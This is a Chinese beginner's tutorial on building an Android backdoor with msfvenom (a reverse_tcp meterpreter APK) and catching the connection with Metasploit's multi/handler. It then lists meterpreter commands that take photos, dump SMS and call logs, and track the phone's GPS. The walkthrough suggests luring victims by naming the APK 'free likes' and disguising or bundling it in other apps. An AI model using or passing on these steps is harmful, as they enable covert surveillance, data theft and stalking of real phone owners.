Kali Linux利用MSF入侵安卓手机(小白版超详细)
一、什么是msf
Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
演示环境
使用Kali 2021.3进行演示操作。
目标靶机:模拟器逍遥 Android 7.1.2。
软件:msfvenom、msfconsole(Kali系统内置)。
二、渗透流程
1.进入管理员模式
命令:sudo su
解释:不在管理员模式下运行可能会有权限不够的提示,为了避免命令执行失败,在管理员下运行以下命令。
提示:执行命令之后输入Kali的密码,密码是被隐藏的,直接输入然后回车即可。
2.生成可执行木马文件
命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=LPORT=R >.apk
实例:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.32.1 LPORT=5555 R >Android.apk
解释:本地ip写自己Kali的IP地址,用ifconfig就能查看自己Kali的IP地址。本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就行。文件名可以随便写自己喜欢的名字,比如写免费刷赞,可能更容易让目标主机上钩。
这个就是Kali主机的IP地址。接下来运行命令生成木马。默认生成的文件在根目录下。把刚才生成的安卓后门放到目标靶机中去。
3.运行msfconsole命令
命令:msfconsole
4.配置参数
(1)命令:use exploit/multi/handler(选择模块)
(2)命令:set payload android/meterpreter/reverse_tcp(选择攻击模块)
(3)命令:set LhOST 192.168.32.1(填写自己主机的IP地址)
(4)命令:set lport 5555(填写刚才生成文件时的端口号)
(5)命令:show options(查看设置参数)
(6)命令:exploit -z -j(后台执行)
参数设置好之后在靶机打开程序然后执行步骤6的命令,也可以直接输入命令exploit开始攻击,只要靶机安装了后门软件用什么方法都可以,直接run开始执行攻击也行。
详细攻击配置参数演示:
现在等待靶机打开APP就可以了。
5.在靶机打开可执行文件
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。
6.查看用户
(1)命令:sessions(查看上钩的用户)
(2)命令:sessions -i 1(选择需要攻击的用户)
出现meterpreter你就已经成功的入侵成功。
三、meterpreter入侵安卓手机命令
1.查看对方手机系统信息
命令:sysinfo
2.查看对方手机安装哪些app文件
命令:app_list
3.远程控制对方手机拍摄一张照片
命令:webcam_snap
4.远程控制对方手机开起视频聊天
命令:webcam_chat
5.实时查看对方手机的信息
命令:dump_sms
6.获取对方手机的通讯录
命令:dump_calllog
7.实时获取对方手机GPS定位
命令:geolocate